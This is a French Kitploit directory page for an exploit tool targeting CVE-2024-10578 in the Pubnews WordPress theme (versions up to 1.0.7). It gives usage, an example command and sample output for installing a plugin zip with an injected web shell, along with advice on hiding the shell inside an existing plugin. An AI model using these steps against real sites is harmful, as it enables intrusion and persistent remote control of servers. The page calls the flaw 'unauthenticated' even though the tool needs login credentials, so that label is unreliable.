Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-10578 — Pubnews <= 1.0.7 - Installation non authentifiée de plugin arbitraire | Kitploit
Outils/GitHubGitHub/nxploited/cve-2024-10578
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationDéveloppement de Charges Utiles
GitHubnxploited/cve-2024-10578

CVE-2024-10578

Pubnews <= 1.0.7 - Installation non authentifiée de plugin arbitraire

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-10578: Pubnews <= 1.0.7 - Installation non authentifiée de plugins arbitraires

Description

Le thème Pubnews pour WordPress est vulnérable à l'installation non autorisée de plugins arbitraires en raison d'un manque de vérification des capacités dans la fonction pubnews_importer_plugin_action_for_notice() dans toutes les versions jusqu'à 1.0.7 incluse. Cette vulnérabilité permet aux attaquants authentifiés avec un accès de niveau Abonné ou supérieur d'installer des plugins arbitraires qui peuvent être utilisés pour exploiter d'autres vulnérabilités.

CWE

  • CWE-434 : Téléchargement sans restriction de fichier de type dangereux

CVSS

  • Score : 8.8 (ÉLEVÉ)
  • Version : 3.1
  • Vector String : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Script d'exploitation : wordpress_exploit.py

Ce script exploite la vulnérabilité du thème Pubnews pour installer un plugin arbitraire à partir d'une URL fournie. Le plugin peut contenir un shell malveillant ou toute autre charge utile.

Utilisation

root@kitploit:~

CVE-2024-10578.py [-h] -u URL -un USERNAME -p PASSWORD -url_zip PLUGIN_URL

Pubnews <= 1.0.7 - Unauthenticated Arbitrary Plugin Installation # By Nxploited, Khaled alenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         The URL of the WordPress site
  -un, --username USERNAME
                        The username for WordPress login
  -p, --password PASSWORD
                        The password for WordPress login
  -url_zip, --plugin_url PLUGIN_URL
                        The plugin URL to install (must be a zip file with the shell injected inside)

Exemple

root@kitploit:~
python 
CVE-2024-10578.py -u http://target/wordpress -un admin -p admin -url_zip http://target/shell1.zip

Sortie

root@kitploit:~
[+] Logged in successfully.
[+] Admin _wpnonce extracted: 6bf22371ab
[+] Plugin installed successfully.
[+] Plugin extracted. You can find the shell here: /wp-content/plugins/shell1/

Notes importantes

  • L'URL du plugin doit être un lien direct vers un fichier zip contenant le shell ou toute autre charge utile.
  • Il est recommandé d'utiliser un plugin WordPress existant, d'injecter le shell à l'intérieur, puis de le zipper à nouveau. Téléchargez ce fichier zip vers un lien direct pour l'exploitation.

⚠️ Avertissement

Ce script est destiné uniquement à des fins éducatives. L'auteur n'approuve pas l'utilisation de ce script pour des activités illégales. Utilisez-le de manière responsable et uniquement sur des systèmes pour lesquels vous avez une autorisation explicite de test.

Par : Nxploited | Khaled Alenazi

Télécharger l’outil